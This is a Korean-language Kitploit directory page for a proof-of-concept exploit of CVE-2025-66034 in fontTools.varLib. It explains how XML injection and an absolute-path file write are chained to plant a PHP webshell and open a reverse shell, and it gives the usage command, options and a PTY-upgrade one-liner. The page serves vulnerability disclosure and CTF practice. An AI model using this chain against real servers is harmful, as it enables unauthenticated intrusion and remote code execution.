Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/4nuxd/cve-2025-66034
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingPayload Development
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib Arbitrary File Write → RCE fontTools.varLib의 임의 파일 쓰기 + XML 삽입 취약점에 대한 PoC 익스플로잇

저장소 보기
25개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-66034 — fontTools varLib 임의 파일 쓰기 → RCE

fontTools.varLib의 임의 파일 쓰기 + XML 인젝션 취약점에 대한 PoC 익스플로잇 HackTheBox — VarIaType에서 테스트 완료


취약점

fontTools.varLib는 가변 글꼴을 빌드하기 위해 .designspace XML 파일을 처리합니다. 두 가지 약점이 결합되어 인증 없이 RCE를 달성합니다.

#프리미티브상세
1CDATA 분할을 통한 XML 인젝션<labelname> 내의 공격자 제어 콘텐츠가 출력 글꼴 파일 본문에 그대로 기록되어 임의 데이터를 주입할 수 있습니다.
2os.path.join() 우회를 통한 임의 파일 쓰기<variable-font>의 filename 속성은 절대 경로를 허용합니다. os.path.join()에 전달되면 의도된 출력 디렉터리를 무시하고 공격자가 지정한 파일 시스템 경로에 쓸 수 있습니다.

두 프리미티브를 연결하면 PHP 웹쉘을 웹 접근 가능 경로에 작성하여 인증되지 않은 원격 코드 실행을 달성할 수 있습니다.


사용법

root@kitploit:~
python3 font_varlib.py \
  --ip <공격자-ip> \
  --port <포트> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

옵션

플래그설명
--ip리버스 셸 콜백을 위한 공격자 IP
--port리스너 포트
--upload글꼴 처리 엔드포인트의 전체 URL (POST)
--webroot웹 접근 가능 디렉터리에 매핑되는 서버 측 절대 경로
--shell웹쉘이 접근 가능한 기본 URL
--no-listen자동 리스너 건너뛰기 — 대신 수동 명령 출력
--pwncatnc 대신 pwncat-cs 사용 (가능하면 권장)

의존성

root@kitploit:~
pip install requests fonttools

작동 원리

  1. 마스터 글꼴 — 두 개의 최소 .ttf 파일(source-light.ttf, source-regular.ttf)이 fontTools.FontBuilder를 사용하여 디자인스페이스에 필요한 마스터로 생성됩니다.
  2. 악의적인 .designspace — 다음이 포함된 조작된 XML 파일이 빌드됩니다:
    • <labelname> 내부의 CDATA 분할을 통해 주입된 PHP 웹쉘
    • os.path.join()을 통해 output_dir을 우회하는 <variable-font>의 filename으로 설정된 절대 쓰기 경로
  3. 업로드 — .designspace + 마스터 글꼴이 처리 엔드포인트로 POST됩니다.
  4. 트리거 — 심어진 .php 파일이 요청되어 리버스 셸 페이로드가 실행됩니다.
  5. TTY 업그레이드 — 연결 시 스크립트가 python3 -c 'import pty; pty.spawn("/bin/bash")'를 통해 자동으로 PTY를 생성하고 TERM + stty를 설정하여 완전한 대화형 셸을 제공합니다.

공개 정보

필드
CVECVE-2025-66034
영향을 받는 구성 요소fontTools.varLib
영향인증되지 않은 임의 파일 쓰기 → 원격 코드 실행
컨텍스트글꼴 처리 엔드포인트를 노출하는 웹 애플리케이션

법적 고지

이 도구는 공인된 침투 테스트 및 CTF 사용만을 위해 제작되었습니다. 소유하지 않거나 명시적인 서면 허가를 받지 않은 시스템에 대해 실행하지 마십시오.


4nuxd 작성

도구 다운로드